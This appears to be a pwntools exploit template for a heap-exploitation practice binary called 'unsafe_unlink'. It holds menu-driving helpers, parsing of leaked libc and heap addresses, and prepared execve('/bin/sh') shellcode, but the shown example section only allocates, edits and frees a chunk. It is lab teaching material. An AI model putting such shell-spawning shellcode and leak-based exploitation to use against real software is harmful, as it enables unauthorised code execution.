blob: 8dd9d69e88036b6d45e6d65983dddee2ae8ae3a7 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
|
#!/usr/bin/python3
from pwn import *
elf = context.binary = ELF("unsafe_unlink")
libc = elf.libc
gs = '''
continue
'''
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
else:
return process(elf.path)
# Index of allocated chunks.
index = 0
# Select the "malloc" option; send size.
# Returns chunk index.
def malloc(size):
global index
io.send("1")
io.sendafter("size: ", f"{size}")
io.recvuntil("> ")
index += 1
return index - 1
# Select the "edit" option; send index & data.
def edit(index, data):
io.send("2")
io.sendafter("index: ", f"{index}")
io.sendafter("data: ", data)
io.recvuntil("> ")
# Select the "free" option; send index.
def free(index):
io.send("3")
io.sendafter("index: ", f"{index}")
io.recvuntil("> ")
io = start()
# This binary leaks the address of puts(), use it to resolve the libc load address.
io.recvuntil("puts() @ ")
libc.address = int(io.recvline(), 16) - libc.sym.puts
# This binary leaks the heap start address.
io.recvuntil("heap @ ")
heap = int(io.recvline(), 16)
io.recvuntil("> ")
io.timeout = 0.1
# =============================================================================
# =-=-=- EXAMPLE -=-=-=
# Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written.
shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh"))
# Request a small chunk.
small_chunk = malloc(0x88)
# Edit the small chunk.
edit(small_chunk, "X"*32)
# Free the small chunk.
free(small_chunk)
# =============================================================================
io.interactive()
|